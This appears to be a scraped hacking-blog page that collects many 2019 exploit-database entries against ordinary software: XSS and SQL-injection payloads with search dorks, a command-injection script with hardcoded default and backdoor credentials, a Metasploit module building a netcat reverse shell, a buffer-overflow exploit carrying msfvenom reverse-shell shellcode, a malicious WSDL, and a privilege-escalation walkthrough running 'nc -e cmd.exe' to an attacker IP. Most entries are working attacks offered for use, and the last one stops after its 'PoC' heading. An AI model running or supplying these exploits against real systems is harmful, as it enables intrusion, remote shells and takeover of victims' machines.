# Exploit Title: CentOS Web Panel - Domain Field (Add DNS Zone) Cross-Site Scripting Vulnerability
# Google Dork: N/A
# Date: 22 - April - 2019
# Exploit Author: DKM
# Vendor Homepage: http://centos-webpanel.com
# Software Link: http://centos-webpanel.com
# Version: v0.9.8.793 (Free), v0.9.8.753 (Pro) and 0.9.8.807 (Pro)
# Tested on: CentOS 7
# CVE : CVE-2019-11429
# Description:
CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.793 (Free/Open Source Version), 0.9.8.753 (Pro) and 0.9.8.807 (Pro) is vulnerable to Reflected XSS for the "Domain" field on the "DNS Functions > "Add DNS Zone" screen.
# Steps to Reproduce:
1. Login into the CentOS Web Panel using admin credential.
2. From Navigation Click on "DNS Functions" > "Add DNS Zone"
3. In "Domain" field give simple payload as: "<script>alert(1)</script>//" , fill other details like IP and Admin Email and Click "Add DNS zone"
4. Now one can see that the XSS Payload executed.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591925
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Zotonic <=0.46 mod_admin (Erlang) - Reflective Cross-Site Scripting
# Date: 24-04-2019
# Exploit Author: Ramòn Janssen
# Researchers: Jan-martin Sijs, Joost Quist, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: http://zotonic.com/
# Software Link: https://github.com/zotonic/zotonic/releases/tag/0.46.0
# Version: <=0.46
# CVE : CVE-2019-11504
Attack type
Remote
Impact
Code Execution
Zotonic versions prior to 0.47 have multiple authenticated Reflected Cross-Site Scripting (XSS) vulnerabilities in the management module. The vulnerabilitie can be exploited when an authenticated user with administrative permissions visits the crafted URL (i.e. when phished or visits a website containing the URL). The XSS effects the following URLs and parameters of the management module:
- /admin/overview/ [qcat, qcustompivot, qs]
- /admin/users/ [qs]
- /admin/media/ [qcat,qcustompivot, qs]
Example: https://[host]/admin/overview?qcustompivot="><script>prompt(‘XSS’)</script>
Affected source code file zotonic_mod_admin:
- zotonic_mod_admin_identity\priv\templates\_admin_sort_header.tpl
- zotonic_mod_admin_identity\priv\templates\admin_users.tpl
Reference(s)
http://docs.zotonic.com/en/latest/developer-guide/releasenotes/rel_0.47.0.html
# Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass
# Date: 2019-05-01
# Exploit Author: Veyselxan
# Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?s_rank=4
# Tested on: Linux
https://eowynlab.cf/autobot-follow/index.php
username: admin' or '1'='1
Password: admin' or '1'='1
#Vendor: Solarwinds
#Site Vendor: https://www.dameware.com/
#Product: Dameware Mini Remote Control
#Version: 10.0 x64
#Platform: Windows
#Tested on: Windows 7 SP1 x64
#Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability.
#The buffer size passed in on the machine name parameter is not checked
#Vector: pass buffer to the machine host name parameter
#Author: Dino Barlattani dinbar78@gmail.com
#Link: http://www.binaryworld.it
#CVE ID: CVE-2019-9017
#POC in VB Script
option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
#1\"
for i = 0 to 300
buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
fold = fold & exe
fold = chr(34) & fold & chr(34)
result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
end if
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[Vendor]
www.microsoft.com
[Product]
Windows PowerShell ISE
The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell.
In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface.
[Vulnerability Type]
Filename Parsing Flaw Remote Code Execution 0day
[References]
ZDI-CAN-8005
[Security Issue]
Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain
array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename
and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of
PowerShell ISE allowing potential unexpected remote code execution.
In PowerShell brackets are used to access array elements.
PS C:\> $a=1..10
PS C:\> $a[4]
5
However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file.
That file must contain a single matching char value which is also found in our specially crafted filename.
Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a
file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L".
Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols.
PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application.
These chars also get the job done:
"$" "_" "#" "^" plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 ====> _.ps1
[Hello].ps1 will execute this instead =====> h.ps1
Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to
another PS file named -.ps1 and seems to treat it sort of like a meta-character.
[pw3d].ps1 <===== expected to execute
3.ps1 <===== actually executed
This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code
in ISE that is expected to run. However, when the user debugs the script a different script gets executed.
Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss.
User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous.
Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and
yet ... still they get PWNED!.
Tested successfully on Win7/10
Long live user interaction! lol...
[POC Video URL]
https://www.youtube.com/watch?v=T2I_-iUPaFw
[Exploit/POC]
After opening PS files in ISE, set the execution policy so can test without issues.
set-executionpolicy unrestricted -force
PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd.
set-executionpolicy unrestricted -force process
Choose 'R' to run once.
Below Python script will create two .ps1 files to demonstrate the vulnerable condition.
Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it...
BAM! other PS script executes!.
#PowerShell ISE 0day Xploit
#ZDI-CAN-8005
#ZDI CVSS: 7.0
#hyp3rlinx
#ApparitionSec
fname1="[HelloWorldTutoria1].ps1" #Expected code to run is 'HelloWorld!'
fname2="1.ps1" #Actual code executed is calc.exe for Poc
evil_code="start calc.exe" #Edit to suit your needs.
c=0
payload1='Write-Output "Hello World!"'
payload2=evil_code+"\n"+'Write-Output "Hello World!"'
def mk_ps_hijack_script():
global c
c+=1
f=open(globals()["fname"+str(c)],"wb")
f.write(globals()["payload"+str(c)])
f.close()
if c<2:
mk_ps_hijack_script()
if __name__=="__main__":
mk_ps_hijack_script()
print "PowerShell ISE Xploit 0day Files Created!"
print "Discovery by hyp3rlinx"
print "ZDI-CAN-8005"
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
ZDI Case opened : 2019-02-06
Case officially contracted to ZDI : 2019-02-20
Vendor Disclosure : 2019-03-01
submitted to the vendor as ZDI-CAN-8005.
April 25, 2019 : MSRC response (as per ZDI): "we've determined that this doesn't meet the bar for servicing via a security update.
we have opened a bug with the PowerShell team, and this is something they may address in a future release as a form of defense-in-depth."
ZDI also indicated they too will close the case.
May 1, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Blue Angel Software Suite - Authenticated Command Execution
# Google Dork: N/A
# Date: 02/05/2019
# Exploit Author: Paolo Serracino
# Vendor Homepage: http://www.5vtechnologies.com
# Software Link: N/A
# Version: All
# Tested on: Embedded Linux OS
# CVE : N/A
# Description: Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services is vulnerable to an authenticated
# command execution in ping command. All default accounts can be used to login and achieve command execution, including the guest one.
# Moreover there's another account, defined in the local file device.dat, that provides an apparently "backdoor" account.
# A list of these accounts is hardcoded in the script.
#/usr/bin/python
import sys
import requests
def check_sw(target,port):
res = requests.get(target + ':' + port)
if '/cgi-bin/webctrl.cgi?action=index_page' in res.text:
return True
else:
print "[-] DOES NOT LOOK LIKE THE PAGE WE'RE LOOKING FOR"
return False
def check_login(target,port,command):
if not check_sw(target,port):
sys.exit()
creds_common = [('blueangel','blueangel'), #the "backdoor" account
('root','abnareum10'),
('root','Admin@tbroad'),
('root','superuser'),
('user','user') ,
('guest','guest'),
]
for i in range(len(creds_common)):
postdata=[('action','login_authentication'),
('redirect_action','sysinfo_page'),
('login_username',creds_common[i][0]),
('login_password',creds_common[i][1]),
('B1','Login')
]
res = requests.post(target + ':' + port + '/cgi-bin/webctrl.cgi',data=postdata)
if 'Set-Cookie' in res.headers:
cookie = res.headers.get('Set-Cookie')
print '[+] LOGGED IN WITH CREDENTIALS ' + str(creds_common[i][0] + ' : ' + creds_common[i][1])
execute_cmd(target,port,cookie,command)
return True
def execute_cmd(target,port,cookie,cmd):
print '[+] EXECUTING COMMAND'
new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
'Referer': target,
'Cookie': cookie
})
res = requests.get(target + ':' + port + '/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1;' + cmd + '&B1=PING',headers=new_headers)
res_lines = res.text.splitlines()
result = []
copy = False
for line in res_lines:
if 'round-trip min/avg/max' in line:
copy = True
elif '</pre></body></html>' in line:
copy = False
elif copy == True:
result.append(line)
print('[+] COMMAND RESPONSE')
print('------------------------------------------')
for r in result:
print r
print('------------------------------------------')
def main():
if len(sys.argv) < 4:
print '[-] 3 ARGS: TARGET PORT SHELL_COMMAND'
sys.exit()
target = sys.argv[1]
port = sys.argv[2]
command = sys.argv[3]
if not check_login(target,port,command):
print '[-] COULD NOT FIND VALID CREDENTIALS'
if __name__ == "__main__":
main()
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'LG Supersign EZ CMS RCE',
'Description' => %q{
LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone
to remote code execution due to an improper parameter handling
},
'Author' => ['Alejandro Fanjul'],
'References' =>
[
[ 'CVE', '2018-17173' ],
[ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 21 2018'
)
)
register_options(
[
OptString.new('RPORT',[true,'Target port','9080'])
], self.class)
end
def exploit
lhost=datastore['LHOST']
lport=datastore['LPORT']
#uri = target_uri.path
cmd = Rex::Text.uri_encode(payload.encoded)
connect
res = send_request_raw({
'method'=>'GET',
'uri'=>"/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150"
})
handler
disconnect
end
end
# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
# Github: https://github.com/hash3liZer/CVE-2019-9978
# Version: <=3D 3.5.2
# CVE: CVE-2019-9978
# Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
# Github: https://github.com/hash3liZer/CVE-2019-9978
# Version: <= 3.5.2
# CVE: CVE-2019-9978
import sys
import requests
import re
import urlparse
import optparse
class EXPLOIT:
VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"
def __init__(self, _t, _p):
self.target = _t
self.payload = _p
def engage(self):
uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
r = requests.get( uri )
if r.status_code == 500:
print "[*] Received Response From Server!"
rr = r.text
obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
if obj:
resp = obj.groups()[0]
if resp:
print "[<] Received: "
print resp.replace( "lnbreak", "\n" )
else:
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
else:
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
else:
sys.exit( "[~] Unexpected Status Received!" )
def main():
parser = optparse.OptionParser( )
parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
parser.add_option( '' , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )
(options, args) = parser.parse_args()
print "[>] Sending Payload to System!"
exploit = EXPLOIT( options.target, options.payload )
exploit.engage()
if __name__ == "__main__":
main()
# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)
# Date: May 4, 2019
# Author: ElSoufiane
# Version: 2.5b4
# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional
# Discovered by: Krystian Kloskowski
#
# Set up a multi handler listener in MSFConsole
# then run exploit
#
# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149
# [+] Sending exploit payload...
#
# Check the MSFConsole listener
#
# msf5 exploit(multi/handler) > run
# [*] Started reverse TCP handler on 0.0.0.0:5801
# [*] Encoded stage with x86/shikata_ga_nai
# [*] Sending encoded stage (267 bytes) to 172.17.0.1
# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000
# C:\Xitami>
import socket
import sys
import struct
if len(sys.argv) != 2 :
print "[+] Usage : python exploit.py [VICTIM_IP]"
exit(0)
TCP_IP = sys.argv[1]
TCP_PORT = 80
egg = "SOUFSOUF"
nops = "\x90"*10
#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed
shellcode = "\x89\xe0\xd9\xe5\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x68\x68\x6c\x42\x63\x30\x37\x70\x63\x30"
shellcode += "\x51\x70\x6b\x39\x6d\x35\x70\x31\x6f\x30\x70\x64"
shellcode += "\x4e\x6b\x76\x30\x70\x30\x4e\x6b\x76\x32\x54\x4c"
shellcode += "\x6e\x6b\x72\x72\x46\x74\x6c\x4b\x53\x42\x55\x78"
shellcode += "\x34\x4f\x4e\x57\x42\x6a\x35\x76\x30\x31\x59\x6f"
shellcode += "\x4e\x4c\x77\x4c\x70\x61\x31\x6c\x75\x52\x34\x6c"
shellcode += "\x35\x70\x6b\x71\x38\x4f\x56\x6d\x47\x71\x4a\x67"
shellcode += "\x4a\x42\x49\x62\x63\x62\x63\x67\x6e\x6b\x63\x62"
shellcode += "\x52\x30\x4c\x4b\x53\x7a\x77\x4c\x6e\x6b\x70\x4c"
shellcode += "\x72\x31\x31\x68\x59\x73\x30\x48\x53\x31\x68\x51"
shellcode += "\x72\x71\x4e\x6b\x30\x59\x57\x50\x55\x51\x6e\x33"
shellcode += "\x4c\x4b\x73\x79\x72\x38\x48\x63\x56\x5a\x62\x69"
shellcode += "\x4c\x4b\x66\x54\x6c\x4b\x73\x31\x49\x46\x64\x71"
shellcode += "\x4b\x4f\x6c\x6c\x5a\x61\x68\x4f\x66\x6d\x77\x71"
shellcode += "\x69\x57\x30\x38\x4b\x50\x74\x35\x58\x76\x55\x53"
shellcode += "\x71\x6d\x6b\x48\x55\x6b\x73\x4d\x44\x64\x32\x55"
shellcode += "\x4a\x44\x43\x68\x4c\x4b\x70\x58\x31\x34\x65\x51"
shellcode += "\x4a\x73\x62\x46\x4e\x6b\x54\x4c\x52\x6b\x6e\x6b"
shellcode += "\x33\x68\x37\x6c\x43\x31\x4b\x63\x6e\x6b\x34\x44"
shellcode += "\x6c\x4b\x43\x31\x4a\x70\x4c\x49\x37\x34\x37\x54"
shellcode += "\x44\x64\x51\x4b\x73\x6b\x53\x51\x52\x79\x52\x7a"
shellcode += "\x42\x71\x6b\x4f\x69\x70\x71\x4f\x43\x6f\x32\x7a"
shellcode += "\x4c\x4b\x37\x62\x7a\x4b\x4e\x6d\x71\x4d\x55\x38"
shellcode += "\x56\x53\x70\x32\x77\x70\x65\x50\x62\x48\x44\x37"
shellcode += "\x42\x53\x74\x72\x63\x6f\x43\x64\x33\x58\x42\x6c"
shellcode += "\x63\x47\x31\x36\x54\x47\x6d\x59\x6b\x58\x69\x6f"
shellcode += "\x4e\x30\x4e\x58\x4c\x50\x67\x71\x47\x70\x67\x70"
shellcode += "\x37\x59\x4a\x64\x31\x44\x56\x30\x70\x68\x55\x79"
shellcode += "\x4f\x70\x30\x6b\x63\x30\x6b\x4f\x68\x55\x61\x7a"
shellcode += "\x35\x5a\x72\x48\x39\x50\x79\x38\x45\x51\x4f\x71"
shellcode += "\x52\x48\x46\x62\x43\x30\x32\x36\x39\x39\x6c\x49"
shellcode += "\x59\x76\x36\x30\x46\x30\x36\x30\x32\x70\x51\x50"
shellcode += "\x36\x30\x67\x30\x76\x30\x32\x48\x6a\x4a\x56\x6f"
shellcode += "\x79\x4f\x39\x70\x59\x6f\x79\x45\x5a\x37\x70\x6a"
shellcode += "\x46\x70\x71\x46\x63\x67\x30\x68\x6e\x79\x69\x35"
shellcode += "\x44\x34\x30\x61\x59\x6f\x59\x45\x6d\x55\x49\x50"
shellcode += "\x53\x44\x55\x5a\x79\x6f\x30\x4e\x66\x68\x53\x45"
shellcode += "\x6a\x4c\x6a\x48\x52\x47\x73\x30\x33\x30\x73\x30"
shellcode += "\x61\x7a\x55\x50\x33\x5a\x67\x74\x71\x46\x66\x37"
shellcode += "\x62\x48\x45\x52\x68\x59\x4f\x38\x51\x4f\x59\x6f"
shellcode += "\x6b\x65\x4f\x73\x7a\x58\x53\x30\x63\x4e\x57\x46"
shellcode += "\x4c\x4b\x35\x66\x32\x4a\x63\x70\x72\x48\x63\x30"
shellcode += "\x76\x70\x65\x50\x77\x70\x73\x66\x62\x4a\x37\x70"
shellcode += "\x32\x48\x46\x38\x4e\x44\x76\x33\x79\x75\x79\x6f"
shellcode += "\x5a\x75\x6e\x73\x76\x33\x52\x4a\x73\x30\x76\x36"
shellcode += "\x42\x73\x32\x77\x33\x58\x45\x52\x78\x59\x78\x48"
shellcode += "\x61\x4f\x39\x6f\x59\x45\x4d\x53\x49\x68\x45\x50"
shellcode += "\x73\x4d\x61\x38\x71\x48\x62\x48\x55\x50\x53\x70"
shellcode += "\x35\x50\x53\x30\x33\x5a\x45\x50\x76\x30\x33\x58"
shellcode += "\x56\x6b\x34\x6f\x46\x6f\x34\x70\x4b\x4f\x78\x55"
shellcode += "\x71\x47\x75\x38\x31\x65\x70\x6e\x52\x6d\x50\x61"
shellcode += "\x4b\x4f\x79\x45\x33\x6e\x31\x4e\x4b\x4f\x44\x4c"
shellcode += "\x76\x44\x56\x6f\x4e\x65\x72\x50\x79\x6f\x69\x6f"
shellcode += "\x6b\x4f\x68\x69\x4d\x4b\x79\x6f\x79\x6f\x49\x6f"
shellcode += "\x56\x61\x5a\x63\x71\x39\x69\x56\x51\x65\x69\x51"
shellcode += "\x4f\x33\x6d\x6b\x5a\x50\x68\x35\x4e\x42\x50\x56"
shellcode += "\x52\x4a\x57\x70\x36\x33\x69\x6f\x5a\x75\x41\x41"
egghunter ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"+"SOUF"+"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
nseh_jmp = "\xeb\xaa" #jmp back 84 bytes
seh = "\x87\x1d\x40" # (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite )
payload = "A"*120
payload += egghunter
payload += "A"*(190-len(payload))
payload += nseh_jmp
payload += seh
http_req = "GET / HTTP/1.1\r\n"
http_req += "Host: "+ TCP_IP +"\r\n"
http_req += "User-Agent: "+egg+nops+shellcode+"\r\n"
http_req += "If-Modified-Since: Wed, " + payload + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()
<!--
# Exploit Title: ReadyAPI Remote Code Execution Vulnerability.
# Date: May, 2019
# Exploit Author: Gilson Camelo => https://twitter.com/gscamelo
# Vendor Homepage: https://smartbear.com/product/ready-api
# Software Link: https://smartbear.com/product/ready-api/overview/
# Github: https://github.com/gscamelo/CVE-2018-20580
# Version: 2.5.0 and 2.6.0
# Tested on: Windows
# CVE : CVE-2018-20580
I found a new vulnerability in the (ReadyAPI). It allows an attacker to
execute a remote code on the local machine putting in danger the ReadyAPI
users including developers, pentesters, etc...
The ReadyAPI allows users to open a SOAP project and import WSDL files that
help the users to communicate with the remote server easily.
The WSDL file owner can determine default values of some parameters. An
attacker can impersonate a legitimate web service and inject a malicious
code into a default value of one of the parameters and spread it to
ReadyAPI clients.
When a ReadyAPI client load a malicious WSDL file to his project and send a
request containing the malicious code the ReadyAPI will execute the
malicious code on the victim's computer.
The attack scenario:
An attacker impersonates a regular web service with a WSDL containing the
malicious code.
The victim creates a new project in the ReadyAPI and loads the malicious
WSDL File.
The victim decides to send a request to the remote server and the ReadyAPI
execute the malicious code.
The attacker succeeds in executing malicious code in the victim's machine
and take it over.
-->
<?xml version="1.0" encoding="UTF-8"?>
<wsdl:definitions
xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
xmlns:tns="http://example.com/stockquote.wsdl"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:s="http://www.w3.org/2001/XMLSchema"
xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
targetNamespace="http://example.com/stockquote.wsdl"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">
<wsdl:types>
<s:schema elementFormDefault="qualified" targetNamespace="http://example.com/stockquote.wsdl">
<s:element name="Malicious_Request">
<s:complexType>
<s:sequence>
<s:element name="Payload" default="PWNED" type="s:string" />
</s:sequence>
</s:complexType>
</s:element>
</s:schema>
</wsdl:types>
<wsdl:message name="Malicious_RequestSoapIn">
<wsdl:part name="parameters" element="tns:Malicious_Request" />
</wsdl:message>
<wsdl:portType name="Exploit">
<wsdl:operation name="Malicious_Request">
<wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">Create a new xpl</wsdl:documentation>
<wsdl:input message="tns:Malicious_RequestSoapIn" />
<wsdl:output message="tns:Malicious_RequestSoapOut" />
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name="Exploit" type="tns:Exploit">
<soap:binding transport="http://schemas.xmlsoap.org/soap/http" />
<wsdl:operation name="Malicious_Request">
<soap:operation soapAction="https://www.test.com.br/Malicious_Request" style="document" />
<wsdl:input>
<soap:body use="literal" />
</wsdl:input>
<wsdl:output>
<soap:body use="literal" />
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name="XPL">
<wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">My first Exploit</wsdl:documentation>
<wsdl:port name="Exploit" binding="tns:Exploit">
<soap:address location="http%3A%2F%2F127.0.0.1%2F%24%7B%3DRuntime.getRuntime%28%29.exec%28%27calc.exe%27%29%7D%3B" />
</wsdl:port>
</wsdl:service>
</wsdl:definitions>
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64
Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.
The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config.
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.
Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret
2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler
3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe
4. Setup listener on attacking machine
nc -nlvvp 443
5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat
6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar
7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System
[+] Sql Injection on microASP (Portal+) CMS
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.microasp.it/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)
[+] Exploit :
http://host/patch/pagina.phtml?explode_tree= [SQL Injection]
[+] PoC :
https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF
[+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://blondish.net/
[+] Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"click.php3?bannerID="" // use your brain ;)
[+] Exploit :
http://host/patch//click.php3?bannerID= [SQL Injection]
[+] Vulnerable File :
<?php
$bannerAdsPath = './ads.dat';
require './ads.inc.php';
///////////////////////////////////////
// Don't Edit Anything Below This Line!
///////////////////////////////////////
for ($i = 0; $i < count($ads); $i++) {
if(ereg('^' .$_GET['id']. '\|\|', $ads[$i])) {
$data = explode('||', $ads[$i]);
if ($_SERVER['REMOTE_ADDR'] != $bannerAds['blockip']) {
$data[ PHPADS_ADELEMENT_CLICKTHRUS ]++;
}
$ads[$i] = join('||', $data);
break;
}
}
if (!$data[PHPADS_ADELEMENT_LINK_URI]) {
die();
}
writeads();
Header("Location: ". $data[PHPADS_ADELEMENT_LINK_URI]);
exit;
?>
[+] PoC :
